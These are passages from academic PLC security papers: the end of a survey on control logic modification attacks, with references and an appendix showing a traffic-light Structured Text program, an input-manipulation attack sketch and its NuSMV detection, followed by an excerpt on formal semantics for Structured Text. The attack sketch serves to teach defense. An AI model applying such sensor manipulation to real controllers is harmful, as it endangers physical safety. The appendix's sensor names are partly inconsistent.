This paper provided a systematization of knowledge on control logic modification attacks and formal verification-based defenses. We categorized existing studies based on threat models, security goals, and underlying weaknesses, and discussed the techniques and approaches applied by these studies. Our systematization showed that control logic modification attacks have evolved with the system design. Advanced attacks can compromise the whole chain of control and, in the meantime, evade various security detection methods. We found that formal verification based defense studies focus more on integrity than on confidentiality and availability. We also found that the majority of the research investigates ad hoc formal verification techniques, and that barriers exist in every aspect of formal verification.

To overcome these barriers, we suggest a full chain of protection and we encourage future research to investigate the following: (1) formalize plant behaviors to defend against input manipulation attacks, (2) explore stealthy attack detection with state reduction techniques, (3) automate domain-specific specification generation and incremental specification generation, and (4) explore real-time verification with more support from open-source tools and thorough evaluation.

Acknowledgment

The authors would like to thank the anonymous reviewers for their insightful comments.
This project was supported by the National Science Foundation (Grant #CNS-1748334) and the Army Research Office (Grant #W911NF-18-1-0093). Any opinions, findings, and conclusions or recommendations expressed in this paper are those of the authors and do not necessarily reflect the views of the funding agencies or sponsors.

References

[1] Siemens SIMATIC PCS7, WinCC, TIA Portal (Update D). https://www.us-cert.gov/ics/advisories/ICSA-19-134-08.
[2] Simatic S5 PLC. https://en.wikipedia.org/wiki/Simatic_S5_PLC.
[3] Ali Abbasi and Majid Hashemi. Ghost in the PLC: designing an undetectable programmable logic controller rootkit via pin control attack. Black Hat Europe, 2016:1-35, 2016.
[4] Borja Fernandez Adiego, Dániel Darvas, Enrique Blanco Viñuela, Jean-Charles Tournier, Simon Bliudze, Jan Olaf Blech, and Víctor Manuel González Suárez. Applying model checking to industrial-sized PLC programs. 11(6):1400-1410, 2015.
[5] Yamine Aït-Ameur, Patrick Girard, and Francis Jambon. Using the B formal approach for incremental specification design of interactive systems. In IFIP International Conference on Engineering for Human-Computer Interaction, pages 91-109. Springer, 1998.
[6] Thiago Alves. PLC addressing. https://www.openplcproject.com/reference/plc-addressing/.
[7] Thiago Alves and Thomas Morris. OpenPLC: An IEC 61131-3 compliant open source industrial controller for cyber security research. Computers & Security, 78:364-379, 2018.
[8] Michael J Assante. Confirmation of a coordinated attack on the Ukrainian power grid. SANS Industrial Control Systems Security Blog, 207, 2016.
[9] Nanette Bauer, Sebastian Engell, Ralf Huuck, Sven Lohmann, Ben Lukoschus, Manuel Remelhe, and Olaf Stursberg. Verification of PLC programs given as sequential function charts. In Integration of Software Specification Techniques for Applications in Engineering, pages 517-540. Springer, 2004.
[10] Darlam Fabio Bender, Benoît Combemale, Xavier Crégut, Jean Marie Farines, Bernard Berthomieu, and François Vernadat. Ladder metamodeling and PLC program validation through time Petri nets. In European Conference on Model Driven Architecture - Foundations and Applications, pages 121-136. Springer, 2008.
[11] Dillon Beresford. Exploiting Siemens Simatic S7 PLCs. Black Hat USA, 16(2):723-733, 2011.
[12] Sebastian Biallas, Jörg Brauer, and Stefan Kowalewski. Arcade.PLC: A verification platform for programmable logic controllers. In 2012 Proceedings of the 27th IEEE/ACM International Conference on Automated Software Engineering, pages 338-341. IEEE, 2012.
[13] Sidi Ould Biha. A formal semantics of PLC programs in Coq. In 2011 IEEE 35th Annual Computer Software and Applications Conference, pages 118-127. IEEE, 2011.
[14] Dimitri Bohlender and Stefan Kowalewski. Compositional verification of PLC software using horn clauses and mode abstraction. IFAC-PapersOnLine, 51(7):428-433, 2018.
[15] Marcello Bonfe and Cesare Fantuzzi. Design and verification of mechatronic object-oriented models for industrial control systems. In EFTA 2003. 2003 IEEE Conference on Emerging Technologies and Factory Automation. Proceedings (Cat. No. 03TH8696), volume 2, pages 253-260. IEEE, 2003.
[16] Ed Brinksma and Angelika Mader. Verification and optimization of a PLC control schedule. In International SPIN Workshop on Model Checking of Software, pages 73-92. Springer, 2000.
[17] Géraud Canet, Sandrine Couffin, J-J Lesage, Antoine Petit, and Philippe Schnoebelen. Towards the automatic verification of PLC programs written in Instruction List. Volume 4, pages 2449-2454. IEEE, 2000.
[18] Henrik Carlsson, Bo Svensson, Fredrik Danielsson, and Bengt Lennartson. Methods for reliable simulation-based PLC code verification. IEEE Transactions on Industrial Informatics, 8(2):267-278, 2012.
[19] Goran Cengic, Oscar Ljungkrantz, and Knut Akesson. Formal modeling of function block applications running in IEC 61499 execution runtime. In 2006 IEEE Conference on Emerging Technologies and Factory Automation, pages 1269-1276. IEEE, 2006.
[20] Simon Chadwick, Phillip James, Markus Roggenbach, and Tom Wetner. Formal Methods for Industrial Interlocking Verification. In 2018 International Conference on Intelligent Rail Transportation (ICIRT), pages 1-5. IEEE, 2018.
[21] Tianyou Chang, Qiang Wei, Wenwen Liu, and Yangyang Geng. Detecting PLC program malicious behaviors based on state verification. Volume 11067 of Lecture Notes in Computer Science, pages 241-255, Cham, 2018. Springer International Publishing.
[22] Eyasu Getahun Chekole, Sudipta Chattopadhyay, Martín Ochoa, Huaqun Guo, and Unnikrishnan Cheramangalath. CIMA: Compiler-enforced resilience against memory safety attacks in cyber-physical systems. Computers & Security, page 101832, 2020.
[23] Long Cheng, Ke Tian, and Danfeng Yao. Orpheus: Enforcing cyber-physical execution semantics to defend against data-oriented attacks. In Proceedings of the 33rd Annual Computer Security Applications Conference, pages 315-326, 2017.
[24] Stephen Chong, Joshua Guttman, Anupam Datta, Andrew Myers, Benjamin Pierce, Patrick Schaumont, Tim Sherwood, and Nickolai Zeldovich. Report on the NSF workshop on formal methods for security. arXiv preprint arXiv:1608.00678, 2016.
[25] Dániel Darvas, Borja Fernández Adiego, András Vörös, Tamás Bartha, Enrique Blanco Viñuela, and Víctor M González Suárez. Formal verification of complex properties on PLC programs. In International Conference on Formal Techniques for Distributed Objects, Components, and Systems, pages 284-299. Springer, 2014.
[26] Dániel Darvas, Enrique Blanco, and V. Molnár. PLCverif Re-engineered: An Open Platform for the Formal Analysis of PLC Programs. ICALEPCS.
[27] Dániel Darvas, Enrique Blanco Viñuela, and István Majzik. A formal specification method for PLC-based applications. 2015.
[28] Dániel Darvas, István Majzik, and Enrique Blanco Viñuela. Generic representation of PLC programming languages for formal verification. In Proc. of the 23rd PhD Mini-Symposium, pages 6-9.
[29] Dániel Darvas, István Majzik, and Enrique Blanco Viñuela. Formal verification of safety PLC based control software. In International Conference on Integrated Formal Methods, pages 508-522. Springer, 2016.
[30] Dániel Darvas, István Majzik, and Enrique Blanco Viñuela. PLC program translation for verification purposes. Periodica Polytechnica Electrical Engineering and Computer Science, 61(2):151-165, 2017.
[31] Alessandro Di Pinto, Younes Dragoni, and Andrea Carcano. Triton: The first ICS cyber attack on safety instrument systems. In Proc. Black Hat USA, pages 1-26, 2018.
[32] Rolf Drechsler et al. Advanced formal verification, volume 122. Springer, 2004.
[33] Nicolas Falliere, Liam O Murchu, and Eric Chien. W32.Stuxnet dossier. White paper, Symantec Corp., Security Response, 5(6):29, 2011.
[34] Alessio Ferrari, Gianluca Magnani, Daniele Grasso, and Alessandro Fantechi. Model checking interlocking control tables. In FORMS/FORMAT 2010, pages 107-115. Springer, 2011.
Model checking interlocking control tables. InFORMS/FORMAT 2010, pages 107 115. Springer, 2011. [35] Georg Frey and Lothar Litz. Formal methods in PLC program- ming. In Smc 2000 conference proceedings. 2000 ieee interna- tional conference on systems, man and cybernetics. cyberneticsevolving to systems, humans, organizations, and their complexinteractions (cat. no. 0, volume 4, pages 2431 2436. IEEE, 2000. [36] Joel Galv ao, Cedrico Oliveira, Helena Lopes, and Laura Tiainen. Formal veri cation: Focused on the veri cation using a plantmodel. In International Conference on Innovation, Engineering and Entrepreneurship, pages 124 131. Springer, 2018. 399 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. [37] Luis Garcia, Ferdinand Brasser, Mehmet Hazar Cintuglu, Ahmad- Reza Sadeghi, Osama A Mohammed, and Saman A Zonouz. Hey, My Malware Knows Physics! Attacking PLCs with PhysicalModel Aware Rootkit. In NDSS, 2017. [38] Luis Garcia, Stefan Mitsch, and Andr e Platzer. HyPLC: Hybrid programmable logic controller program translation for veri ca-tion. In Proceedings of the 10th ACM/IEEE International Con- ference on Cyber-Physical Systems, pages 47 56, 2019. [39] Luis Garcia, Stefan Mitsch, and Andr e Platzer. Toward multi- task support and security analyses in plc program translation forveri cation. In Proceedings of the 10th ACM/IEEE International Conference on Cyber-Physical Systems, pages 348 349, 2019. [40] Luis Garcia, Saman Zonouz, Dong Wei, and Leandro P eger De Aguiar. Detecting PLC control corruption via on-deviceruntime veri cation. In 2016 Resilience Week (RWS), pages 67 72. IEEE, 2016. [41] Holger Giese, Sabine Glesner, Johannes Leitner, Wilhelm Sch afer, and Robert Wagner. Towards veri ed model transformations. InProc. of the 3rd International Workshop on Model Development,V alidation and V eri cation (MoDeV 2a), Genova, Italy, pages 78 93. Citeseer, 2006. [42] Vincent Gourcuff, Olivier De Smet, and J-M Faure. Ef cient representation for formal veri cation of PLC programs. In 2006 8th International Workshop on Discrete Event Systems, pages182 187. IEEE, 2006. [43] Naman Govil, Anand Agrawal, and Nils Ole Tippenhauer. On ladder logic bombs in industrial control systems. In Computer Security, pages 110 126. Springer, 2017. [44] Muluken Hailesellasie and Syed Rafay Hasan. Intrusion Detection in PLC-Based Industrial Control Systems Using Formal Veri ca-tion Approach in Conjunction with Graphs. Journal of Hardware and Systems Security, 2(1):1 14, 2018. [45] Joseph Y Halpern and Moshe Y Vardi. Model checking vs. theo- rem proving: a manifesto. Arti cial intelligence and mathematical theory of computation, 212:151 176, 1991. [46] Daavid Hentunen and Antti Tikkanen. Havex hunts for ics/scada systems. In F-Secure. 2014. [47] Yanhong Huang, Xiangxing Bu, Gang Zhu, Xin Ye, Xiaoran Zhu, and Jianqi Shi. KST: Executable Formal Semantics of IEC 61131-3 Structured Text for Veri cation. IEEE Access, 7:14593 14602, 2019. [48] ICS-CERT. CVE-2017-12088. https://nvd.nist.gov/vuln/detail/ CVE-2017-12088. [49] ICS-CERT. CVE-2017-12739. https://nvd.nist.gov/vuln/detail/ CVE-2017-12739. [50] ICS-CERT. CVE-2017-13997. https://nvd.nist.gov/vuln/detail/ CVE-2017-13997. [51] ICS-CERT. CVE-2018-10619. https://nvd.nist.gov/vuln/detail/ CVE-2018-10619. [52] ICS-CERT. CVE-2019-10922. https://nvd.nist.gov/vuln/detail/ CVE-2019-10922. [53] Helge Janicke, Andrew Nicholson, Stuart Webber, and Antonio Cau. 
Runtime-monitoring for industrial control systems. Elec- tronics, 4(4):995 1017, 2015. [54] Sushma Kalle, Nehal Ameen, Hyunguk Yoo, and Irfan Ahmed. CLIK on PLCs! Attacking control logic with decompilation andvirtual PLC. In Binary Analysis Research (BAR) Workshop, Network and Distributed System Security Symposium (NDSS),2019. [55] Anastasis Keliris and Michail Maniatakos. ICSREF: A framework for automated reverse engineering of industrial control systemsbinaries. In 26th Annual Network and Distributed System Security Symposium, NDSS 2019. The Internet Society, 2019. [56] Eui-Sub Kim, Dong-Ah Lee, Sejin Jung, Junbeom Yoo, Jong- Gyun Choi, and Jang-Soo Lee. NuDE 2.0: A Formal Method-based Software Development, Veri cation and Safety AnalysisEnvironment for Digital I&Cs in NPPs. Journal of Computing Science and Engineering, 11(1):9 23, 2017.[57] St ephane Klein, Lothar Litz, and Jean-Jacques Lesage. Fault de- tection of discrete event systems using an identi cation approach.IF AC Proceedings V olumes, 38(1):92 97, 2005. [58] Johannes Klick, Stephan Lau, Daniel Marzin, Jan-Ole Malchow, and V olker Roth. Internet-facing PLCs-a new back ori ce. Black- hat USA, pages 22 26, 2015. [59] Sam Kottler, Mehdy Khayamy, Syed Rafay Hasan, and Omar Elkeelany. Formal veri cation of ladder logic programs usingNuSMV. InSoutheastCon 2017, pages 1 5. IEEE, 2017. [60] Jochen K uhner. Dotnetsiemensplctoolboxlibrary. https://github.com/jogibear9988/DotNetSiemensPLCToolBoxLibrary. [61] Egor Vladimirovich Kuzmin, AA Shipov, and Dmitrii Aleksan- drovich Ryabukhin. Construction and veri cation of PLC pro-grams by LTL speci cation. In 2013 Tools & Methods of Program Analysis, pages 15 22. IEEE, 2013. [62] Sandrine Lamp eri`ere-Couf n, Olivier Rossi, J-M Roussel, and J-J Lesage. Formal validation of PLC programs: a survey. In 1999 European Control Conference (ECC), pages 2170 2175. IEEE,1999. [63] Robert M Lee, Michael J Assante, and Tim Conway. German steel mill cyber attack. Industrial Control Systems, 30:62, 2014. [64] Bernard Lim, Daniel Chen, Yongkyu An, Zbigniew Kalbarczyk, and Ravishankar Iyer. Attack induced common-mode failureson plc-based safety system in a nuclear power plant: Practicalexperience report. In 2017 IEEE 22nd Paci c Rim International Symposium on Dependable Computing (PRDC), pages 205 210.IEEE, 2017. [65] Luca Luccarini, Gianni Luigi Bragadin, Gabriele Colombini, Maurizio Mancini, Paola Mello, Marco Montali, and DavideSottara. Formal veri cation of wastewater treatment processesusing events detected from continuous signals by means of ar-ti cial neural networks. Case study: SBR plant. Environmental Modelling & Software, 25(5):648 660, 2010. [66] Angelika Mader. A classi cation of PLC models and applications. InDiscrete Event Systems, pages 239 246. Springer, 2000. [67] PLC Manual. Basic Guide to PLCs: PLC Programming. https: //www.plcmanual.com/plc-programming. [68] Stephen McLaughlin and Patrick McDaniel. SABOT: speci cation-based payload generation for programmable logiccontrollers. In Proceedings of the 2012 ACM conference on Computer and communications security, pages 439 449, 2012. [69] Stephen McLaughlin and Saman Zonouz. Controller-aware false data injection against programmable logic controllers. In 2014 IEEE International Conference on Smart Grid Communications(SmartGridComm), pages 848 853. IEEE, 2014. [70] Stephen E McLaughlin. On Dynamic Malware Payloads Aimed at Programmable Logic Controllers. In HotSec, 2011. 
[71] Stephen E McLaughlin, Saman A Zonouz, Devin J Pohly, and Patrick D McDaniel. A Trusted Safety Veri er for ProcessController Code. In NDSS, volume 14, 2014. [72] S Mesli-Kesraoui, A Toguyeni, A Bignon, F Oquendo, D Kesraoui, and P Berruet. Formal and joint veri cation of controlprograms and supervision interfaces for socio-technical systemscomponents. IF AC-PapersOnLine, 49(19):426 431, 2016. [73] Houda Bel Mokadem, B eatrice Berard, Vincent Gourcuff, Olivier De Smet, and Jean-Marc Roussel. Veri cation of a timed mul-titask system with UPPAAL. IEEE Transactions on Automation Science and Engineering, 7(4):921 932, 2010. [74] Il Moon. Modeling programmable logic controllers for logic veri cation. IEEE Control Systems Magazine, 14(2):53 59, 1994. [75] Il Moon, Gary J Powers, Jerry R Burch, and Edmund M Clarke. Automatic veri cation of sequential control systems using tem-poral logic. AIChE Journal, 38(1):67 75, 1992. [76] Josh Newell, Linna Pang, David Tremaine, Alan Wassyng, and Mark Lawford. Translation of IEC 61131-3 function blockdiagrams to PVS for formal veri cation with real-time nuclearapplication. Journal of Automated Reasoning, 60(1):63 84, 2018. 400 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. [77] Mohamed Niang, Alexandre Philippot, Franc ois Gellot, Rapha el Coupat, Bernard Riera, and S ebastien Lefebvre. Formal Veri - cation for Validation of PSEEL s PLC Program. In ICINCO (1), pages 567 574, 2017. [78] Tolga Ovatman, Atakan Aral, Davut Polat, and Ali Osman Unver. An overview of model checking practices on veri cation of PLC software. Software & Systems Modeling, 15(4):937 960, 2016. [79] Olivera Pavlovic and Hans-Dieter Ehrich. Model checking PLC software written in function block diagram. In 2010 Third International Conference on Software Testing, V eri cation andV alidation, pages 439 448. IEEE, 2010. [80] Mathias Rausch and Bruce H Krogh. Formal veri cation of PLC programs. In Proceedings of the 1998 American Control Conference. ACC (IEEE Cat. No. 98CH36207) , volume 1, pages 234 238. IEEE, 1998. [81] Blake C Rawlings, John M Wassick, and B Erik Ydstie. Applica- tion of formal veri cation and falsi cation to large-scale chemicalplant automation systems. Computers & Chemical Engineering , 114:211 220, 2018. [82] Olivier Rossi and Philippe Schnoebelen. Formal modeling of timed function blocks for the automatic veri cation of LadderDiagram programs. In Proceedings of the 4th International Conference on Automation of Mixed Processes: Hybrid DynamicSystems (ADPM 2000), pages 177 182. Citeseer, 2000. [83] Saranyan Senthivel, Shrey Dhungana, Hyunguk Yoo, Irfan Ahmed, and Vassil Roussev. Denial of engineering operationsattacks in industrial control systems. In Proceedings of the Eighth ACM Conference on Data and Application Security and Privacy,pages 319 329, 2018. [84] Abraham Serhane, Mohamad Raad, Raad Raad, and Willy Susilo. PLC code-level vulnerabilities. In 2018 International Conference on Computer and Applications (ICCA), pages 348 352. IEEE,2018. [85] Ralf Spenneberg, Maik Br uggemann, and Hendrik Schwartke. Plc-Blaster: A worm living solely in the plc. Black Hat Asia, Marina Bay Sands, Singapore, 2016. [86] Ruimin Sun. PLC-control-logic-CVE. https://github.com/ gracesrm/PLC-control-logic-CVE/blob/master/README.md. [87] Michael Tiegelkamp and Karl-Heinz John. IEC 61131-3: Pro- gramming industrial automation systems. Springer, 1995. [88] Sidney E Valentine Jr. 
Appendix 1. Extended Background

This section offers an example of an ST program controlling the traffic lights at a road intersection. We demonstrate an input manipulation attack and the process of using formal verification to detect and prevent it.

1.1. An ST Code Example. Code 1 shows a simplified traffic light program written in ST. The program controls the light status (e.g., green, yellow, red) at an intersection between two roads in the north-south (NS) direction and the east-west (EW) direction. The program takes input from sensors telling whether emergency vehicles are approaching (line 4), and whether pedestrians press the button to request crossing the intersection (line 5). In Code 1, lines 8 to 11 define the output variables representing the status of the lights in the NS and EW directions.
By default, the light status in the NS direction is green, and the light status in the EW direction is red. Then, lines 13 to 23 define the logic for changing the light status based on the values of the input variables.

 1  TYPE Light : (Green, Yellow, Red); END_TYPE;
 2  PROGRAM TrafficLight
 3  VAR_INPUT
 4      SensorNS : BOOL; SensorEW : BOOL;
 5      ButtonNS : BOOL; ButtonEW : BOOL;
 6  END_VAR
 7
 8  VAR_OUTPUT
 9      LightNS : Light := Green;
10      LightEW : Light := Red;
11  END_VAR
12
13  IF LightNS = RED AND LightEW = RED AND NOT(ButtonNS) AND NOT(SensorEW) THEN
14      (* turn green when light is red, button is reset, and no emergency detected *)
15      LightNS := Green;
16  ELSIF LightNS = GREEN AND LightEW = RED AND SensorEW THEN
17      (* light must change when emergency approaches in EW direction *)
18      LightNS := Yellow;
19  ELSIF LightNS = GREEN THEN
20      LightNS := Green;
21  ELSE
22      LightNS := Red;
23  END_IF;
24
25  (* The EW light status changes in a similar way *)
26  (* Omitted *)
27  END_PROGRAM

Code 1: A traffic light program in ST.

1.2. An Attack Example. Normally, when the NS light is red and an emergency vehicle is sensed in the NS direction, the sensor stays on until the NS light is switched to green. However, an attacker can manipulate the emergency sensor by switching it on (e.g., SensorNS := TRUE) when the NS light is red and the EW light is green, and switching it off (e.g., SensorNS := FALSE) when the NS light is red and the EW light is yellow. This can cause the green lights of both the NS direction and the EW direction to be on simultaneously.

1.3. Formal Verification. Next, we show how formal verification can catch the above-mentioned input manipulation attack.

We first model the ST program in the SMV language. The model can be written manually or generated automatically with open-source tools such as st2smv. As Code 2 shows, input variables are defined as IVAR in lines 2 to 6. Other variables are defined as VAR in lines 7 to 9 and initialized in ASSIGN using the init function in lines 10 to 12. Lines 14 to 25 define the transitions of the light status, representing the program logic of Code 1, lines 13 to 26. We then specify the property that the green lights of the NS direction and the EW direction will never be on simultaneously. This is done in line 28, in which A denotes "for all paths" and G denotes "globally".

 1  MODULE main
 2  IVAR
 3      button_NS : boolean;
 4      button_EW : boolean;
 5      sensor_NS : boolean;
 6      sensor_EW : boolean;
 7  VAR
 8      light_NS : {RED, YELLOW, GREEN};
 9      light_EW : {RED, YELLOW, GREEN};
10  ASSIGN
11      init(light_NS) := GREEN;
12      init(light_EW) := RED;
13
14      next(light_NS) := case
15          light_NS = RED & light_EW = RED & button_NS = FALSE & sensor_EW = FALSE : GREEN;
16          light_NS = GREEN & light_EW = RED & sensor_EW = TRUE : YELLOW;
17          light_NS = GREEN : GREEN;
18          TRUE : {RED};
19      esac;
20
21      next(light_EW) := case
22          light_EW = RED & light_NS = RED & button_EW = FALSE & sensor_NS = FALSE : GREEN;
23          light_EW = GREEN & light_NS = RED & sensor_NS = TRUE : YELLOW;
24          light_EW = GREEN : GREEN;
25          TRUE : {RED};
26      esac;
27
28  SPEC AG ! (light_NS = GREEN & light_EW = GREEN)

Code 2: SMV model for the traffic light program.
Last, we use NuSMV to verify the property and obtain the following counterexample.

-> State: 1.1 <-
  light_NS = GREEN
  light_EW = RED
-> Input: 1.2 <-
  button_NS = FALSE
  button_EW = FALSE
  sensor_NS = FALSE
  sensor_EW = TRUE
-> State: 1.2 <-
  light_NS = YELLOW
-> Input: 1.3 <-
  sensor_EW = FALSE
-> State: 1.3 <-
  light_NS = RED
-> Input: 1.4 <-
-> State: 1.4 <-
  light_NS = GREEN
  light_EW = GREEN

Listing 1: A counterexample from the formal verification.

Listing 1 shows that in the initial state (State 1.1) the NS light is green and the EW light is red. Then, in State 1.2, the program receives the input SensorEW = TRUE, so the NS light switches to yellow. Next, in State 1.3, the input SensorEW changes to FALSE, but the NS light still has to change from yellow to red. Finally, in State 1.4, the EW light switches to green due to the earlier emergency request (SensorEW = TRUE) in State 1.2, while the NS light also switches to green because that request has been cleared (SensorEW = FALSE) in State 1.3.

The above counterexample reveals the input manipulation attack of Section 1.2. To prevent this attack, one can either forbid the input pattern of the counterexample, or redevelop the ST program accordingly.
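One way to "redevelop the ST program accordingly" is sketched below, under the assumption that the light-selection logic of Code 1 is otherwise unchanged: an explicit mutual-exclusion interlock appended after the IF/ELSIF blocks of both directions. The guard is our illustration, not part of the original program; after adding the corresponding constraint to the SMV model, NuSMV should report the AG property as true.

(* Illustrative interlock, appended after the light-selection logic of Code 1 *)
IF LightNS = Green AND LightEW = Green THEN
    (* fail safe: never release conflicting greens; hold the EW direction at red *)
    LightEW := Red;
END_IF;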
KST_Executable_Formal_Semantics_of_IEC_61131-3_Structured_Text_for_Verification.pdf
Programmable logic controllers (PLCs) are special-purpose computers designed to perform industrial automation tasks. They require highly reliable control programs, particularly when used in safety-critical systems such as nuclear power stations. In the development of reliable control programs, formal methods are "highly recommended" because the correctness of the intended programs can be mathematically proven. Formal methods generally require precise semantics indicating how the program behaves during execution. However, for PLC programming languages, formal semantics is not always available, rendering the application of formal methods highly challenging. In this paper, we present formal operational semantics of Structured Text (ST), a widely used PLC programming language. The semantics is based on the ST language specification provided by IEC 61131-3, a generally acknowledged international standard for PLCs. We define the formal semantics in K, which is a rewriting-based semantic framework and has been successfully applied in defining the semantics of many general-purpose programming languages such as C [1] and Java [2]. We validate our formal semantics by testing examples from the standard and then apply the semantics to the verification of control programs for PLCs.

syntax tree obtained by parsing the input PLC program and identifies all POU declarations (in the k cell) sequentially. This phase is further divided into two steps, as shown in Figure 6. In the first step, multiple pou cells are created, each corresponding to a POU declaration. The cells nested in pou are then populated based on the information about the POU. In the second step, KST creates an instance (denoted by an ins cell) for every PG and FC. Details are discussed in Section 4.3.1 using the semantic rules for the declaration of POUs. In addition, the identifiers of PG instances are collected into the pgs cell, which is sent to the next phase.

Initializing phase. An initializing phase occurs after preprocessing. In this phase, KST iterates over PG instances on the basis of their identifiers stored in the pgs cell and allocates memory for their variables based on the declaration of variables. If a variable is declared as an FB instance, an instance of the FB is created, and memory is allocated for the variables of the created instance. This phase continues until all instances are created and memory has been allocated for their variables.

TABLE 1. The syntax of ST in IEC 61131-3.
FIGURE 6. The workflow of KST.

Scan cycle. The actual execution of the PLC program, following cyclic scanning, occurs during this phase. As depicted in Figure 6, this phase is subdivided into three steps, each of which corresponds to a phase of the scan cycle (as shown in Figure 2). In the first step, input signals are taken from the in cell and stored in the corresponding storage locations. In the second step, KST sequentially executes the PG instances in pgs and updates the related storage contents on the basis of the predefined control algorithm (i.e., its statements) and the current values of the input variables. In the third step, the values of the output variables are appended to the out cell. This phase is repeated and never terminates.

1) POU DECLARATION
As previously discussed, POU declaration constructs are identified by KST in the preprocessing phase.
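For orientation, the kind of POU declaration construct identified in this phase is sketched below: a minimal function block with one static variable. The identifier names are ours and purely illustrative, not taken from the paper.

FUNCTION_BLOCK RisingEdge
VAR_INPUT  Clk  : BOOL; END_VAR
VAR_OUTPUT Q    : BOOL; END_VAR
VAR        Prev : BOOL := FALSE; END_VAR   (* static variable: retained across invocations *)
    Q    := Clk AND NOT Prev;              (* true for exactly one scan after a rising edge of Clk *)
    Prev := Clk;
END_FUNCTION_BLOCK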
The semantic rule for the declaration of a function block-type POU is shown in (2) below. As explained in Section IV-A, the meaning of this semantic rule is not difficult to understand: the top computation in k is consumed, and a new pou cell, created from that top computation, is added to the pous cell during preprocessing. If the identified construct is the declaration of a program-type POU then, in addition to the rewriting in (2), KST also creates a single instance for it and records its identifier in the pgs cell. That is,

⟨ (·Bag ⇒ ⟨ ⟨·Map⟩_iEnv ⟨·Map⟩_iIns ⟨Name⟩_iType ⟨I⟩_iId ⟩_ins)  ⟨I ⇒ I + 1⟩_nId ⟩_inss   ⟨·List ⇒ ListItem(I)⟩_pgs

⟨FUNCTION_BLOCK Name Vars Stmts END_FUNCTION_BLOCK ⇒ ·K⟩_k
⟨·Bag ⇒ ⟨ ⟨Name⟩_pName ⟨·K⟩_pRet ⟨Vars⟩_pVars ⟨Stmts⟩_pStmts ⟩_pou⟩_pous
⟨preprocessing⟩_phase        (2)

where ListItem(I) is a built-in K method used to create a list item. If the top computation in the k cell is the declaration of a function-type POU, KST also creates a single instance for it. Moreover, KST allocates memory for its variables by rewriting the top computation into an auxiliary function alloc(Name, I, RT). Notably, an additional variable bearing the same name as the function is added and is used to store its return value.

2) VARIABLE DECLARATION
In ST, the declaration of variables is a construct starting with one of the keywords "VAR_INPUT", "VAR_OUTPUT", "VAR_IN_OUT", "VAR_EXTERNAL", "VAR_TEMP", "VAR", or "VAR_GLOBAL" (which indicates the category of a variable) and ending with the keyword "END_VAR". After preprocessing, KST iterates over the instances of programs in the pgs cell and allocates memory for variables on the basis of the variable declaration constructs. For example, (3) shows the semantic rule for the input variable declaration construct.

⟨VAR_INPUT X : T := V; END_VAR ⇒ ·K⟩_k   ⟨·Map ⇒ L ↦ input⟩_catg   ⟨ ⟨·Map ⇒ X ↦ L⟩_iEnv ⟨I⟩_iId ⟩_ins
⟨·Map ⇒ L ↦ V⟩_store   ⟨L ⇒ L + 1⟩_nLoc   ⟨·Map ⇒ L ↦ T⟩_type   ⟨I⟩_pid   ⟨initializing⟩_phase        (3)

Variables declared within the "VAR ... END_VAR" construct can be made constants by using the qualifier "CONSTANT". KST then populates the cnst cell with a new mapping L ↦ 1, denoting that the value in location L is a constant. In addition to being declared with a primitive type such as "BOOL" or "INT", a variable can also be declared as an instance of a function block-type POU. The corresponding semantic rule is shown in (4).

⟨VAR X : FBName := (Params); END_VAR ⇒ alloc(Vars, J) ↷ init(Params, J)⟩_k   ⟨I⟩_pid
⟨ (·Bag ⇒ ⟨ ⟨·Map⟩_iEnv ⟨·Map⟩_iIns ⟨FBName⟩_iType ⟨J⟩_iId ⟩_ins)  ⟨J ⇒ J + 1⟩_nId ⟩_inss
⟨ ⟨·Map ⇒ X ↦ J⟩_iIns ⟨I⟩_iId ⟩_ins   ⟨ ⟨FBName⟩_pName ⟨Vars⟩_pVars ⟩_pou   ⟨initializing⟩_phase        (4)

In accordance with this semantic rule, KST first creates an instance of the function block-type POU, and a new mapping from the variable name to the instance identifier is added to the iIns cell of the current instance. KST then allocates memory for the variables of the instance J recursively (denoted by alloc(Vars, J)) and initializes some input variables on the basis of the parameter assignment list Params.

3) SCAN CYCLE
KST implements the particular "cyclic scanning" mechanism, which enables the interpreter derived from KST to execute ST programs in the PLC manner. After initialization, KST enters the scan cycle phase, and execution is repeated cyclically and never terminated. Semantic rule (5) shows the operations of the updating-inputs phase, in which _ denotes that the current value can be anything.
The semantic rule for the writing-outputs phase is similar to (5) and thus is not presented here. The semantic rules describing operations in the executing-programs phase are discussed in Section IV-C.4.

⟨·K⟩_k   ⟨InVList (ListItem(L, V, T1) ⇒ ·K)⟩_in   ⟨L ↦ (_ ⇒ V)⟩_store   ⟨L ↦ T2⟩_type   ⟨L ↦ input⟩_catg   ⟨updating inputs⟩_phase
    when size(In) > 0 and T1 = T2
⟨·K ⇒ Is⟩_k   ⟨updating inputs ⇒ executing programs⟩_phase   ⟨InVList⟩_in   ⟨Is⟩_pgs
    when size(In) = 0        (5)

4) STATEMENTS
We now discuss some semantic rules for statements. All semantic rules presented in this section describe operations during the executing-programs phase; thus, we omit the ⟨⟩_phase cell from the following semantic rules. The lookup of a simple variable is given in Section IV-A. We present here the semantic rule for the lookup of a variable within an instance of a function block-type POU and omit its explanation.

⟨X.Var ⇒ V :: T⟩_k   ⟨ ⟨X ↦ J …⟩_iIns ⟨I⟩_iId ⟩_ins   ⟨L ↦ T⟩_type   ⟨ ⟨Var ↦ L …⟩_iEnv ⟨J⟩_iId ⟩_ins   ⟨L ↦ V⟩_store   ⟨I⟩_pid        (6)

The semantic rule for the assignment statement (e.g., X := Exp;) is shown in (7). The assignment operator ":=" is given the strictness attribute (evaluation strategy) "[strict(2)]" to ensure an appropriate evaluation order. That is, the right-hand side of an assignment is evaluated before the assignment itself can be executed. When the assignment rule is fired, the right-hand side has become a value of the form "V :: T".

⟨X := V :: T1; ⇒ ·K⟩_k   ⟨L ↦ (_ ⇒ V)⟩_store   ⟨X ↦ L⟩_env   ⟨L ↦ T2⟩_type   ⟨L ↦ C⟩_cnst
    when T1 = getType(T2) and C = 0        (7)

The execution of an instance of a program-type POU is invoked implicitly by the PLC system. This process is handled in KST by iterating over the instances of program-type POUs in the pgs cell. Formally,

⟨I ⇒ Stmts⟩_k   ⟨_ ⇒ I⟩_pid   ⟨_ ⇒ E⟩_env   ⟨ ⟨E⟩_iEnv ⟨T⟩_iType ⟨I⟩_iId ⟩_ins   ⟨ ⟨T⟩_pName ⟨Stmts⟩_pStmts ⟩_pou        (8)

